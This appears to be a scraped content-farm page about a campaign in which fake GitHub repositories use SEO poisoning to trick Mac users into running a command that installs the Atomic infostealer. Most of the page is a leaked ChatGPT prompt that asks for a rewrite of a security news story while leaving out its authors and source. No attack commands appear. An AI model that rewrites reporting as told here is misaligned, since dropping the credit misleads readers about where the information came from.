Fast Facts
-
SEO Poisoning Attack: A new campaign is targeting Mac users through targeted SEO poisoning, misleading them to malicious GitHub repositories posing as legitimate software.
-
Infostealer Deployment: The campaign includes repositories that claim to offer genuine MacOS software but actually deliver the Atomic infostealer (AMOS) when users follow instructions provided on the fake pages.
-
Wide-ranging Targets: LastPass reports that various tech and financial companies were targeted, with the campaign utilizing multiple fake GitHub accounts to create convincing listings.
- Mitigation Recommendations: Users are urged to download software only from official app stores and to use robust antivirus protection, along with secure storage methods like password managers to prevent potential data theft.
[gptAs a technology journalist, write a short news story divided in two subheadings, at 12th grade reading level about ‘Attackers Use Phony GitHub Pages to Deliver Mac Malware’in short sentences using transition words, in an informative and explanatory tone, from the perspective of an insightful Tech News Editor, ensure clarity, consistency, and accessibility. Use concise, factual language and avoid jargon that may confuse readers. Maintain a neutral yet engaging tone to provide balanced perspectives on practicality, possible widespread adoption, and contribution to the human journey. Avoid passive voice. The article should provide relatable insights based on the following information ‘
An emerging threat campaign is using targeted SEO poisoning to hit Mac users with infostealers.
That’s according to LastPass’s Threat Intelligence, Mitigation, and Escalation (TIME) team, which on Sept. 18 published a blog post dedicated to an emerging threat campaign involving phony GitHub pages claiming to be from legitimate companies. Code repositories have been used in several attacks lately, including the Shai-Hulud worm, the compromise of prolific NPM developer Qix, the Salesloft breach, and more.
According to LastPass blog post authors Alex Cox, Mike Kosak, and Stephanie Schneider, threat actors are publishing GitHub repositories containing malware that claim to be MacOS versions of legitimate software, all the while leveraging SEO to ensure the fake repositories are positioned well in search results.
GitHub Mac Attack
LastPass said the campaign has targeted a range of companies across the technology and financial sectors, including LastPass. In that case, researchers discovered two fake listings from GitHub users for repositories offering “LastPass Premium on MacBook.” The pages used in the campaign were created by multiple GitHub usernames and are littered with MacOS-related terminology.
The site included a download link that instructs users to paste a specific line of code into the Mac terminal. That code, at least in the case of the fake LastPass pages, leads to the download and execution of the Atomic infostealer (also known as AMOS).
Both pages were created on GitHub on Sept. 16, and LastPass said “these sites were immediately submitted for takedown and are now inactive.”
This type of thing has been done before; LastPass cited research published in July detailing a similar social engineering campaign in which attackers claimed to offer a MacOS version of package manager Homebrew on GitHub. Following the page’s instructions would similarly lead to malware installations.
And last month, CrowdStrike detailed a campaign by a threat group it tracks as Cookie Spider. The group attempted to compromise more than 300 customer environments using “SHAMOS,” a variant of the aforementioned Atomic infostealer. The campaign similarly utilized malvertising to get its stealer into victim environments, which CrowdStrike said was blocked by its Falcon platform.
“Operating as malware-as-a-service, COOKIE SPIDER rents this information stealer to cybercriminals who deploy it to harvest sensitive information and cryptocurrency assets from victims,” CrowdStrike said in its research. “The campaign utilized malvertising to direct users to fraudulent macOS help websites where victims were instructed to execute a malicious one-line installation command.”
CrowdStrike’s research tracked the Cookie Spider campaign back to June, but the Atomic infostealer has been active since at least April 2023, LastPass said.
Mitigating the Mac Attack
Dark Reading asked LastPass why Mac users in particular have been targeted by this campaign and malware. Kosak, senior principal intelligence analyst at LastPass, hypothesizes that the group behind the malware may prefer to focus on macOS systems; the attackers may view Mac users “as something of a low-hanging fruit since the dangerous impression that Macs face less of a malware threat continues to linger.”
To mitigate this threat and others like it, Kosak says organizations and users should only download software from legitimate app stores or, in the case of GitHub, confirm that the repository is managed by the relevant company itself. Although, as Kosak notes, “this can be trickier” when considering recent supply chain attacks like those targeting NPM users.
To defend against infostealers, Kosak recommended using current antivirus or EDR protection and, as expected from LastPass, to avoid “storing your credentials or other sensitive information in your browser and [consider] using a password manager or other secure storage method instead.”
‘. Do not end the article by saying In Conclusion or In Summary. Do not include names or provide a placeholder of authors or source. Make Sure the subheadings are in between html tags of
[/gpt3]
Discover More Technology Insights
Learn how the Internet of Things (IoT) is transforming everyday life.
Explore past and present digital transformations on the Internet Archive.
CyberRisk-V1
